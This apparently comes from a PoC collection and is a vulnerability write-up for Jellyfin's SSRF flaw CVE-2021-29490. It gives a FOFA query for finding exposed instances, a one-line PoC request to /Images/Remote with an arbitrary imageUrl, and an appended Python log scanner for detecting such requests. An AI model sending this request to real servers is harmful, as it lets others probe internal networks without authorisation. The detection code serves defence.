Awesome-POC/Web应用漏洞/Jellyfin RemoteImageController.cs SSRF漏洞 CVE-2021-29490.md
2022-12-05 11:09:28 +08:00


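# Jellyfin RemoteImageController.cs SSRF Vulnerability CVE-2021-29490
## Vulnerability Description
An SSRF vulnerability exists in Jellyfin's RemoteImageController.cs file. A specially constructed request can be used to probe information on the internal network.
## Affected Versions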
```
Jellyfin < 10.7.2
```
## FOFA
```
app="Jellyfin"
```
## Reproduction
In the official update, look for the files that were modified.
![](./images/202205241459343.png)
The official update removed a method:
```
function getDisplayUrl(url, apiClient) {
    return apiClient.getUrl('Images/Remote', { imageUrl: url });
}
```
Download the source code of a vulnerable version and find the file that implements this endpoint:
```
Jellyfin.Api/Controllers/RemoteImageController.cs
```
![](./images/202205241459044.png)
The endpoint receives the parameter imageUrl, and the code that follows contains the SSRF vulnerability.
![](./images/202205241459542.png)
Construct the PoC request:
```
/Images/Remote?imageUrl=http://www.baidu.com
```
![](./images/202205241459712.png)
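
For detection on a server that has not yet been upgraded, the following added example (not part of the original write-up and not Jellyfin code) scans web access logs for `/Images/Remote` requests and flags those whose `imageUrl` points at a loopback, private or link-local address. The log format, the sample lines, the function names and the internal-name suffix list are assumptions made for illustration.

```python
import ipaddress
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format), not taken from a real server.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Dec/2022:11:09:28 +0800] "GET /Images/Remote?imageUrl=http://www.baidu.com HTTP/1.1" 200 2381
203.0.113.7 - - [05/Dec/2022:11:09:30 +0800] "GET /Images/Remote?imageUrl=http%3A%2F%2F192.168.1.10%3A8080%2F HTTP/1.1" 200 512
203.0.113.7 - - [05/Dec/2022:11:09:31 +0800] "GET /images/remote?ImageUrl=http://localhost:8096/ HTTP/1.1" 500 0
198.51.100.4 - - [05/Dec/2022:11:10:02 +0800] "GET /web/index.html HTTP/1.1" 200 9120
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

def classify_target(url):
    """Return 'internal', 'external' or 'invalid' for a requested image URL."""
    try:
        host = urlsplit(url).hostname
    except ValueError:
        return "invalid"
    if not host:
        return "invalid"
    # Heuristic suffix list for internal names (an assumption; adjust per site).
    if host == "localhost" or host.endswith((".localhost", ".local", ".internal")):
        return "internal"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "external"  # a DNS name; resolving it is out of scope for this offline check
    return "external" if ip.is_global else "internal"

def find_remote_image_requests(log_text):
    """Return (client, imageUrl, verdict) for each /Images/Remote request in the log."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        # Path and parameter name are compared case-insensitively (assumed server behaviour).
        if not parts.path.lower().endswith("/images/remote"):
            continue
        params = {k.lower(): v for k, v in parse_qs(parts.query).items()}
        for url in params.get("imageurl", []):
            hits.append((client, url, classify_target(url)))
    return hits
```

A name classified as `external` can still resolve to an internal address, so treat any unexpected `/Images/Remote` request against a version below 10.7.2 as worth reviewing.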